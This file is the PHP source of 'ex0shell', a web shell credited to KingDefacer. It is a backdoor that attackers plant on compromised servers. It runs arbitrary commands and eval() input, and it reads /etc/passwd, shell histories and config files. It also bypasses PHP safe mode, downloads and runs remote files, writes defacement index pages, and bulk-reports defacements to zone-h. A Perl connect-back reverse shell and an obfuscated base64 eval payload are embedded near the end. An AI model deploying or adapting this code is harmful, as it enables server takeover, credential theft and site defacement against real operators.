ex0shell Shell & Edited By KingDefacer

";$ef=""; $st=""; $et="

";$c1=""; $c2="";$ec=""; $sta=""; $sfnt="";$efnt=""; ################# Ending of common variables ######################## print"";print"";print"

"; print" ## ex0 shell EDITED BY KingDefacer ## "; print"

";print "
"; print"";print"";print"

"; print"

";print "Home"; print " - Back"; print " - phpinfo"; if ($dlink=='phpinfo'){print phpinfo();die();} print " - Base64 decode"; print " - Url decode"; print " - Url encode"; print " - Md5"; print " - Check permissions"; print " - File source"; print " - Quick index"; print " - Zone-h"; print " - Mail"; print " - Cmd help"; if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase'])); print "
Result is : $sfnt".$cbase."$efnt"; die();} if ($dlink=="basepw"){ print "
[ Base64 - Decoder ]"; print $sf;input ("text","ncbase",$ncbase,35);print " "; input ("submit","","Decode","");print $ef; die();} if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld'])); print "
Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){ print "
[ Url - Decoder ]"; print $sf; input ("text","nurld",$nurld,35);print " "; input ("submit","","Decode","");print $ef; die();} if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print "
Result is : $sfnt".$urlenc."$efnt"; die();} if ($dlink=='urlen'){print "
[ Url - Encoder ]"; print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();} if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf'])); print "
Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){ print "
[ MD5 - Encoder ]"; print $sf;input ("text","nmdf",$nmdf,35);print " "; input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef; print "
";print "
"; if (isset($_REQUEST['mfldr'])){callfuncs('find . -type d -perm -2 -ls'); }elseif (isset($_REQUEST['sfldr'])){callfuncs('find ../ -type d -perm -2 -ls'); }print "";print "
";die();} function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){ print "
[ Sorry, U choosed an empty file or the file not exists ]";die();} elseif(isset($showsc)&&filesize($showsc) !=="0") { print "
"; if (!show_source($showsc)||!function_exists('show_source')){print "[ Sorry can't complete the operation ]";die();}print "
";die();}}if ($dlink=='showsrc'){ print "
: Choose a php file to view in a color mode, any extension else will appears as usual :";print "
"; input ("text","showsc","",35);print " "; input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));} if ($dlink=='cmdhlp'){ print "
: Insert the command below to get help or to know more about it's uses :";print ""; input ("text","hlp","",35);print " "; input ("submit","","Help","");print $ef; die();} if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp']; print "
[ The command is $sfnt".$hlp."$efnt ]"; $hlp = escapeshellcmd($hlp);print "
"; if (!function_exists(shell_exec)&&!function_exists(exec)&& !function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) {print "[ Sorry can't complete the operation ]";}else {print "
"; if(!callfuncs("man $hlp | col -b")){print "[ Finished !! ]";}print "
";}print "
";die();} if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt'])) {if (touch ($_REQUEST['indx'])==true){ $fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt'])); fclose($fp);print "
[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]
";print "[ Yeniden Editle ] -- [ Curr-Dir ]";die(); }else {print "
[ Sorry, Can't create the index !! ]
";die();}} if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){ print $sf."
";print "
Your index contents here
"; input ("text","indx","Index-name",35);print " "; input ("submit","qindsub","Create","");print $ef;die();} if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){ $mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt']; if (mail($mailto,$subj,$mailtxt)){print "
[ Mail sended to $sfnt".$mailto." $efnt successfully ]
"; die();}else {print "
[ Error, Can't send the mail ]
";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "
[ Error, Can't send the mail ]
";die();} if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){ print $sf."
";print "
Your message here
";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " "; input ("submit","mailsub","Send-mail","");print $ef;die();} if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);} function callzone($nscdir){ if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";} else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";} fwrite ($fpz,"\$arq = @ARGV[0]; \$grupo = @ARGV[1]; chomp \$grupo; open(a,\"<\$arq\"); @site = ; close(a); \$b = scalar(@site); for(\$a=0;\$a<=\$b;\$a++) {chomp \$site[\$a]; if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; } print \"[+] Sending \$site[\$a]\n\"; use IO::Socket::INET; \$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next; print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\"; print \$sock \"Accept: */*\r\n\"; print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\"; print \$sock \"Accept-Language: pt-br\r\n\"; print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\"; print \$sock \"Connection: Keep-Alive\r\n\"; print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\"; print \$sock \"Host: old.zone-h.org\r\n\"; print \$sock \"Content-Length: 385\r\n\"; print \$sock \"Pragma: no-cache\r\n\"; print \$sock \"\r\n\"; print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\"; close(\$sock);}"); if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']); }else{print "
[ Can't complete the operation, try change the current dir with writable one ]
";}$zonet=$_REQUEST['zonet']; if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) {print "[ Can't complete the operation !! ]";} else {callfuncs("chmod 777 $zpl;chmod 777 $li"); ob_start();callfuncs("perl $zpl $li $zonet");ob_clean(); print "
[ All sites should be sended to zone-h.org successfully !! ]";die();} }if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){ print $sf."
";print "
www.site1.com www.site2.com
";input ("text","zonet","Hacker-name",35);print " "; input ("submit","zonesub","Send","");print $ef;die();} print "

"; print"

";print "
"; function inisaf($iniv) { $chkini=ini_get($iniv); if(($chkini || strtolower($chkini)) !=='on'){print"OFF ( NOT SECURITY )";} else{ print"Acik ( Guvenli )";}}function inifunc($inif){$chkin=ini_get($inif); if ($chkin==""){print " None";} else {$nchkin=wordwrap($chkin,40,"\n", 1);print "".$nchkin."";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);} elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r'); while (!feof($opop)){ $nval= fgetc($opop);}} elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){ ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();} if($nval=$owhich){print"ON";} else{print"OFF";} } print""; print"

"; print"
"; print"Safe-mode :\t";print inisaf('safe_mode');print "";print""; if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print ""; print""; print""; print""; print""; print""; print""; print "

"; print "

"; print"
Mysql : "; callocmd('which mysql','/usr/bin/mysql'); print"

"; print"
Perl : "; callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"

"; print"
Gcc : "; callocmd('which gcc','/usr/bin/gcc'); print"

"; print"
Curl : "; callocmd('which curl','/usr/bin/curl'); print"

"; print"
GET : "; callocmd('which GET','/usr/bin/GET'); print"

";print"
Wget : "; callocmd('which wget','/usr/bin/wget'); print"

"; print"
Lynx : "; callocmd('which lynx','/usr/bin/lynx'); print"

"; }print "

"; print "YOUR IP: ".$REMOTE_ADDR."
"; print "Server IP : ".$SERVER_ADDR.""; print"
".$SERVER_SIGNATURE.""; print "Server NAME : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."
"; print "Disabled Functions : ";inifunc(disable_functions);print"
"; print "Your Infos : "; callfuncs('id');print"
Os : "; if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else { if (!function_exists(shell_exec)&&!function_exists(exec)&& !function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) {print php_uname(); print "/";print PHP_OS;} else {callfuncs('uname -a');}}print"
"; print"Php-Version : ".phpversion(); print"
Current-path : "; print $nscdir." [ ";permcol($nscdir);print " ]"; print"
";print "Your shells location : " .__file__; print"
Disc Spase: "; readable_size(disk_total_space($nscdir));print " / "; print"Bos Alan: "; readable_size(disk_free_space($nscdir)); print "
"; print"

"; if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']); if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; } else{$mess="Make Dir/ Delete";}}elseif (isset($_REQUEST['deldir'])) { $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}} else{$mess="Make Dir/ Delete";}if(isset($_REQUEST['crefile'])){ $ncfile=trim($_REQUEST['cfile']); if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);} else{ $mess3= "Make a File/ Delete";}} elseif(isset($_REQUEST['delfile'])){ $ndfile=trim($_REQUEST['cfile']); if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";} else {$mess3= "Make Dir/ Delete";}} else {$mess3="Make a File/ Delete";} class upload{ function upload($file,$tmp){ $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";} if (@copy($tmp,$nscdir."/".$file)){ print "

: $file uploaded successfully :

"; }else{print ": Error uploading $file : ";} } } } $obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){ $ustname=trim ($_REQUEST['ustname']);ob_start(); if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);} if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');} if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');} if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');} if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);} if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);} if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);} if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);} if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();} if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&& !isset($_REQUEST['rfiletxt'])){ if ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){ $files[] = $filename; sort($files);}print "
"; print""; print ""; print ""; print ""; print ""; print ""; print ""; print ""; print "";if(strstr(PHP_OS,"Linux")){ print "";} print ""; foreach ($files as $nfiles){ if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");} if (is_writable("$nscdir/$nfiles")){ $scmess2= "yes";}else {$scmess2="Hayir";}if (is_readable("$nscdir/$nfiles")){ $scmess3= "yes";}else {$scmess3= "Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "Dir";}else{$scmess4= "File";} print""; print ""; print ""; print""; print ""; print ""; print "";print ""; if(strstr(PHP_OS,"Linux")){ print "";} print ""; print ""; }print "

"; print "Files";print "	";print "Size";print "	";print "Write";print "	";print "Read";print "	";print "Type";print "	";print "Edit";print "	";print "Rename";print "	";print "Download";print "	";print "Owner";print "	";print "Permission";print "
"; if (is_dir($nfiles)){print "[ $nfiles ] ";}else {print "$nfiles ";} print"	"; print ""; if (is_dir("$nscdir/$nfiles")){print "KDir";} elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";} print "	"; print "$scmess2"; print "	"; print "$scmess3"; print "	"; print "$scmess4"; print"	";if(is_file("$nscdir/$nfiles")){ print " Edit";}else {print "D�zenle";}print"	";print " Rename";print"	"; if(is_file("$nscdir/$nfiles")){ print " Download";}else {print "indir";}print"	"; print "";owgr($nfiles); print "";print"	";print " "; permcol("$nscdir/$nfiles");print " ";print"

";print "
";}else {print "

[ Can't open the Dir, permission denied !! ]
";}} elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){ if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "
[ Executed command ][$] : ".$_REQUEST['cmd']."
";} print "
".$sta; if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);} elseif(isset($_REQUEST['eval'])){ ob_start();eval(stripslashes(trim($_REQUEST['eval']))); $ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);} elseif (isset($_REQUEST['subqcmnds'])){ if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');} if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');} if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');} if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');} if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');} if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');} if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');} if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');} if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');} if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');} if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');} if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');} if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');} }print $eta."
";} function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']); if(is_readable($rfile)&&is_file($rfile)){ $fp=fopen ($rfile,"r");print""; print "
[ Editing ".basename($rfile)." ] [ Back ] [ Curr-Dir ]

"; print $sf.""; while (!feof($fp)){$lines = fgetc($fp); $nlines=htmlspecialchars($lines);print $nlines;} fclose($fp);print "";if (is_writable($rfile)){ print " ".$ef;}else {print "
[ Can't edit ".basename($rfile)." ]

";}print "
";} elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "
[ You selected a wrong file name or you don't have access !! ]

";}} function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']); if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+"); $rfiletxt=stripslashes($_REQUEST['rfiletxt']); fwrite ($rffp,$rfiletxt);print "
[ ".basename($hidrfile)." Saved !! ] [ Curr-Dir ] [ Edit again ]

";fclose($rffp);} else {print "
[ Can't save the file !! ] [ Curr-Dir ] [ Back ]

";}} if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);} elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);} function callperms($chkperms){ $perms = fileperms($chkperms); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); print $info;} function readable_size($size) { if ($size < 1024) { print $size . ' B'; }else {$units = array("kB", "MB", "GB", "TB"); foreach ($units as $unit) { $size = ($size / 1024); if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}} if($dlink=='ren'&&!isset($_REQUEST['rensub'])){ print "
[ Back ]
"; print "".$sf;input ("text","ren",$_REQUEST['ren'],20);print " "; input ("text","renf","New-name",20);print " "; input ("submit","rensub","Rename" ,"");print $ef;die();}else print ""; if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){ if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){ print"
[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]

";print "
[ Curr-dir ]
";die();}else{print "
[ Yeniden Adlandirilamiyor ]
"; print "
[ Back ]
";die();}}function fget($nscdir,$sf,$ef){print ""; print "
[ Editing ".basename($_REQUEST['edit'])." ] [ Back ] [ Curr-Dir ]
"; print $sf.""; $alltxt= file_get_contents($_REQUEST['edit']); $nalltxt=htmlspecialchars($alltxt);print $nalltxt;print ""; if (is_writable($_REQUEST['edit'])){ print " ".$ef;}else {print "
[ Can't edit ".basename($_REQUEST['edit'])." ]

";}}function svetxt(){ $fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){ $nedittxt=stripslashes($_REQUEST['edittxt']); fwrite ($fp,$nedittxt);print "
[ ".basename($_REQUEST['edit'])." Saved !! ]
";fclose($fp);}else {print "
[ Can't save the file !! ]
";}} if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval'])) {fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt'])) {svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){ $fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid); $fileowner=$fileownerarray['name']; $fileg=filegroup($file); $groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name']; print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){ if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}} elseif(isset($_REQUEST['mve'])){ if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);} }else {$cpmvmess="COPY / Select a file for copy then paste";} if (isset ($_REQUEST['safefile'])){ $file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){ if(empty($_GET['file'])){if(empty($_POST['file'])){ print "[ Please choose a file first to read it using copy() ]"; } else {$file=$_POST['file'];}} else {$file=$_GET['file'];}} $temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){ $zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp)); fclose($zrodlo);echo "
".$sta.htmlspecialchars($tekst).$eta."
";unlink($temp);} else { print "Sorry, Can't read the selected file !!
";}}if (isset ($_REQUEST['inifile'])){ ini_restore("safe_mode");ini_restore("open_basedir"); print "
".$sta; if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."
";} if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);} function callback($nscdir,$bip,$bport){ if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";} if (is_writable($nscdir)){ $fp=fopen ("back.pl","w");$backpl='back.pl';} else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';} fwrite ($fp,"use Socket; \$system='$epath'; \$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\"; echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo; echo \"[ User perms ][$]\";echo \"`id`\";echo; echo \"[ Start shell ][$]\";'; if (!\$ARGV[0]) { exit(1); } \$host = \$ARGV[0]; \$port = 80; if (\$ARGV[1]) { \$port = \$ARGV[1]; } \$proto = getprotobyname('tcp') || die('Unknown Protocol\n'); socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n'); my \$target = inet_aton(\$host); if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) { die('Unable to Connect\n'); } if (!fork( )) { open(STDIN,'>&SERVER'); open(STDOUT,'>&SERVER'); open(STDERR,'>&SERVER'); print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]'; print '\n[ A-S-T team ][ Lezr.com ]\n\n'; system(\$sys);system (\$system); exit(0); } ");callfuncs("chmod 777 $backpl"); ob_start(); callfuncs("perl $backpl $bip $bport"); ob_clean(); print "
[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]
[ Check your connection now, if failed try changing the port number ]
[ Or Go to a writable dir and then try to connect again ]
[ Return to the Current dir ] [ Curr-Dir ]

";}if (isset($_REQUEST['uback'])){ $uback=$_REQUEST['uback'];$upip=$_REQUEST['upip']; if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");} elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");} elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}} delm("# Execute Commands #");print ""; print ""; print ""; print ""; print ""; print ""; print ""; delm("");print "
"; print $st.$c1."
".$mess3.$ec; print $c2.$sf."";input("text","cfile","",53); input("hidden","scdir",$nscdir,0);print "
"; input("submit","crefile","Make-it",""); print " ";input("submit","delfile","Delete",""); print "".$ef.$ec.$et."
".$st.$c1; print "
Enter the command to execute";print $ec; print $c2.$sf."
"; input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"
"; input("submit","","Execute","");print "
".$ef.$ec.$et."
";print $st.$c1; print "
$mess".$ec.$c2.$sf.""; input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "
"; input("submit","credir","Create-D","");print " "; input("submit","deldir","Delete-D",""); print "".$ef.$ec.$et."
";print $st.$c1; print "
Edit/Read File".$ec;print $c2.$sf.""; input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "
"; input("submit","","Read-Edit","");print "".$ef.$ec.$et."
";print $st.$c1; print "
View Dir
";print $ec.$c2.$sf."
"; input("text","scdir",$nscdir,59);print"
"; input("submit","","View","");print " "; input("reset","","R00T","");print "
".$ef.$ec.$et."
";print $st.$c1; print "
File size : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2.""; input("file","upfile","",40);input("hidden","scdir",$nscdir,0); input("hidden","up",$nscdir,0); print"
";input("submit","","Upload","");print "".$ef.$ec.$et."
";print "
"; print $st.$c1."
Execute php code with eval()
"; print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0); print " "; if(!isset($evsub)){print "//system('id'); //readfile('/etc/passwd'); //passthru('pwd');";}else{print htmlspecialchars(stripslashes($eval));} print "
"; input('submit','evsub','Execute');print " "; input('Reset','','Reset');print " "; print "".$ec.$ef.$et; print "
"; print $st.$c1."
Execute useful commands
"; print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0); print " ";print" "; print $ec.$ef.$et."
";delm(""); print ""; print "
"; print $st.$c1."
".$cpmvmess."
"; print $ec.$c2.$sf." ";input("text","ftcpy","File-name",15); print " To "; input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " "; input("submit","cpy","Copy","");print " ";input("submit","mve","Move",""); print "".$ec.$ef.$et; print "
"; print $st.$c1."
Important commands
"; print $ec.$c2.$sf." ";input("hidden","scdir",$nscdir,0); print " ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "".$ec.$ef.$et; print "
";delm(": Safe mode bypass :"); print ""; print "
"; print $st.$c1."
Using copy() function
"; print $ec.$c2.$sf." ";input("text","safefile",$nscdir,75); input("hidden","scdir",$nscdir,0);print " "; input("submit","","Read-F","");print "".$ec.$ef.$et; print "
"; print $st.$c1."
Using ini_restore() function
"; print $ec.$c2.$sf." ";input("text","inifile",$nscdir,75); input("hidden","scdir",$nscdir,0);print " "; input("submit","","Read-F","");print "".$ec.$ef.$et; print "
";delm("# Backdoor Connection #"); print ""; print "
"; print $st.$c1."
Backdoor ile Baglan
"; print $ec.$c2.$sf." ";input("text","bip",$REMOTE_ADDR,47);print " "; input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " "; input("submit","","Connect","");print " ";input("reset","","Reset",""); print "".$ec.$ef.$et;print "
";print $st.$c1."
Y�klenmis Backdoor
";print $ec.$c2.$sf." ";print "";print " ";input("text","uback","back.pl",23);print " ";input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect");$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==')); print "".$ec.$ef.$et;print "
"; print"Copyright is reserved to KingDefacer
[ By Turkish Security GROUP Go to : http://alturks.com/ ]"; print "
"; print"
"; print"
"; ?>

